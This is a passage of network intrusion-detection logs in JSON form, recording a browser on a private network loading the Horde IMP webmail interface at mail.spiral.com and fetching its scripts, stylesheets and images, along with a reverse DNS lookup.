Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3108},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/external\/tinycon.js","state":"CLOSED","stored":false,"size":8214,"tx_id":1}} {"timestamp":"2020-02-29T00:01:17.213800+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/imp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1763},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/imp.js","state":"CLOSED","stored":false,"size":5736,"tx_id":5}} {"timestamp":"2020-02-29T00:01:17.219337+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpcore.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3881},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/dimpcore.js","state":"CLOSED","stored":false,"size":13894,"tx_id":0}} {"timestamp":"2020-02-29T00:01:17.219999+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52638,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4980}} {"timestamp":"2020-02-29T00:01:17.222526+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpbase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":27623},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/dimpbase.js","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:01:17.223043+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpbase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":30030}} {"timestamp":"2020-02-29T00:01:17.253333+0000","flow_id":1610366476737736,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52642,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/dragdrop2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5927}} {"timestamp":"2020-02-29T00:01:17.257292+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/js\/sidebar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":744}} {"timestamp":"2020-02-29T00:01:17.257320+0000","flow_id":948834138972290,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52644,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/colorpicker.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3401}} {"timestamp":"2020-02-29T00:01:17.273323+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/search-topbar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":363}} {"timestamp":"2020-02-29T00:01:17.276605+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/search-topbar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":363},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/search-topbar.png","state":"CLOSED","stored":false,"size":363,"tx_id":2}} {"timestamp":"2020-02-29T00:01:17.276888+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/popdown.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":191}} {"timestamp":"2020-02-29T00:01:17.279412+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/popdown.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":191},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/popdown.png","state":"CLOSED","stored":false,"size":191,"tx_id":3}} {"timestamp":"2020-02-29T00:01:17.321425+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87}} {"timestamp":"2020-02-29T00:01:17.365360+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidevert-bg.png","state":"CLOSED","stored":false,"size":87,"tx_id":4}} {"timestamp":"2020-02-29T00:01:17.365830+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131}} {"timestamp":"2020-02-29T00:01:17.380340+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidevert.png","state":"CLOSED","stored":false,"size":131,"tx_id":5}} {"timestamp":"2020-02-29T00:01:17.380862+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/buttonbar-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":107}} {"timestamp":"2020-02-29T00:01:17.380615+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/sidebar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":744},"app_proto":"http","fileinfo":{"filename":"\/js\/sidebar.js","state":"CLOSED","stored":false,"size":1978,"tx_id":6}} {"timestamp":"2020-02-29T00:01:17.380967+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74}} {"timestamp":"2020-02-29T00:01:17.383893+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/buttonbar-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":107},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/buttonbar-bg.png","state":"CLOSED","stored":false,"size":107,"tx_id":6}} {"timestamp":"2020-02-29T00:01:17.384497+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":478}} {"timestamp":"2020-02-29T00:01:17.386531+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":478},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/reload.png","state":"CLOSED","stored":false,"size":478,"tx_id":7}} {"timestamp":"2020-02-29T00:01:17.387940+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":340}} {"timestamp":"2020-02-29T00:01:17.389643+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-split.png","state":"CLOSED","stored":false,"size":74,"tx_id":7}} {"timestamp":"2020-02-29T00:01:17.390218+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":340},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/checkbox_off.png","state":"CLOSED","stored":false,"size":340,"tx_id":8}} {"timestamp":"2020-02-29T00:01:17.395134+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74}} {"timestamp":"2020-02-29T00:01:17.396041+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":89}} {"timestamp":"2020-02-29T00:01:17.396672+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":89},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tablehead-split.png","state":"CLOSED","stored":false,"size":89,"tx_id":8}} {"timestamp":"2020-02-29T00:01:17.397130+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52638,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4980},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/dynamic\/screen.css","state":"CLOSED","stored":false,"size":24076,"tx_id":3}} {"timestamp":"2020-02-29T00:01:17.398639+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tablehead-bg.png","state":"CLOSED","stored":false,"size":74,"tx_id":9}} {"timestamp":"2020-02-29T00:01:17.405089+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":97}} {"timestamp":"2020-02-29T00:01:17.411548+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":96}} {"timestamp":"2020-02-29T00:01:17.412209+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":96},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidehoriz.png","state":"CLOSED","stored":false,"size":96,"tx_id":9}} {"timestamp":"2020-02-29T00:01:17.412923+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13593}} {"timestamp":"2020-02-29T00:01:17.421392+0000","flow_id":1558539106348560,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56244,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":5592,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:17.442042+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52638,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/ico_message_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":468}} {"timestamp":"2020-02-29T00:01:17.446781+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":97},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidehoriz-bg.png","state":"CLOSED","stored":false,"size":97,"tx_id":10}} {"timestamp":"2020-02-29T00:01:17.526761+0000","flow_id":1558539106348560,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56244,"proto":"UDP","dns":{"type":"answer","id":5592,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:17.526761+0000","flow_id":1558539106348560,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56244,"proto":"UDP","dns":{"type":"answer","id":5592,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:17.619055+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":903}} {"timestamp":"2020-02-29T00:01:17.619055+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":903},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":11}} {"timestamp":"2020-02-29T00:01:17.654438+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":903},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2313,"tx_id":11}} {"timestamp":"2020-02-29T00:01:17.655898+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":186}} {"timestamp":"2020-02-29T00:01:17.656035+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13593},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/reload.gif","state":"CLOSED","stored":false,"size":13593,"tx_id":10}} 